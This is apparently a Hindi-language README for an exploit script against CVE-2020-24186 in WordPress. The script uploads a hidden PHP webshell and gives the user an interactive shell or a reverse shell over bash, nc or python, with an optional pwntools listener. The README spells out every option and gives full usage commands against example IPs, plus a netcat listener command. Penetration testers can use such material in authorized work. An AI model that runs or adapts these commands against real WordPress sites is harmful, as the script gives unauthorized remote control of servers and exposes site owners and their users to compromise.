
CVE-2020-24186 के लिए WordPress में एक्सप्लॉइट स्क्रिप्ट जो एक छिपा हुआ PHP वेबशेल अपलोड करती है और वैकल्पिक pwntools लिसनर ऑटोमेशन के साथ इंटरैक्टिव या रिवर्स शेल एक्सेस प्रदान करती है।
यह स्क्रिप्ट WordPress में CVE-2020-24186 कमजोरी का शोषण करके एक छिपे हुए PHP पेलोड को अपलोड करती है और लक्ष्य प्रणाली पर एक शेल प्राप्त करती है। इसके तीन ऑपरेशन मोड हैं:
इंटरैक्टिव शेल:
बुनियादी वेबशेल अपलोड करता है और एक इंटरैक्टिव मोड में प्रवेश करता है, जिससे आप cmd पैरामीटर के माध्यम से कमांड भेज सकते हैं।
मैनुअल रिवर्स शेल:
वेबशेल अपलोड करता है और रिवर्स शेल पेलोड भेजता है, लेकिन स्वचालित रूप से लिसनर शुरू नहीं करता है। आपको निर्दिष्ट IP और पोर्ट पर अपना लिसनर स्वयं शुरू करना होगा।
pwntools के साथ रिवर्स शेल:
वेबशेल अपलोड करता है, रिवर्स शेल पेलोड भेजता है, और स्क्रिप्ट स्वचालित रूप से pwntools का उपयोग करके एक लिसनर शुरू करती है ताकि रिवर्स कनेक्शन कैप्चर हो सके।
requestspwn (pwntools)--url: लक्ष्य साइट का बेस URL (जैसे, )।http://10.10.110.119--blogpath: पोस्ट का पथ (डिफ़ॉल्ट: /?page=1)।--mode: ऑपरेशन का मोड, या तो interactive या reverse।--lhost: रिवर्स शेल के लिए स्थानीय IP (रिवर्स मोड में आवश्यक)।--lport: रिवर्स शेल के लिए स्थानीय पोर्ट (रिवर्स मोड में आवश्यक)।--reverse_method: रिवर्स शेल विधि: bash, nc, या python (डिफ़ॉल्ट bash है)।--manual: जब रिवर्स मोड में उपयोग किया जाता है, तो स्क्रिप्ट लिसनर शुरू नहीं करेगी; आपको अपना लिसनर स्वयं शुरू करना होगा।--use-proxy: यदि सेट किया जाता है, तो अनुरोध कॉन्फ़िगर किए गए प्रॉक्सी के माध्यम से भेजे जाएंगे।वेबशेल अपलोड करें और कमांड भेजने के लिए एक इंटरैक्टिव सत्र शुरू करें:
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy
वेबशेल अपलोड करें, रिवर्स शेल पेलोड भेजें, लेकिन स्वचालित रूप से लिसनर शुरू न करें। अपना लिसनर स्वयं शुरू करें (जैसे, netcat का उपयोग करके):
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy
फिर, दूसरे टर्मिनल में, अपना लिसनर मैन्युअल रूप से शुरू करें:
nc -lvnp 9002
वेबशेल अपलोड करें, रिवर्स शेल पेलोड भेजें, और स्क्रिप्ट को pwntools के साथ स्वचालित रूप से एक लिसनर शुरू करने दें ताकि कनेक्शन कैप्चर हो सके:
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy
स्क्रिप्ट 10.10.1.1:9002 पर कनेक्शन की प्रतीक्षा करेगी और, एक बार कनेक्ट होने पर, एक इंटरैक्टिव शेल प्रदान करेगी।
नोट्स
--php_payload विकल्प का उपयोग करके PHP पेलोड को संशोधित कर सकते हैं।--use-proxy फ्लैग का उपयोग करते हैं, तो प्रॉक्सी सेटिंग्स की दोबारा जाँच करें।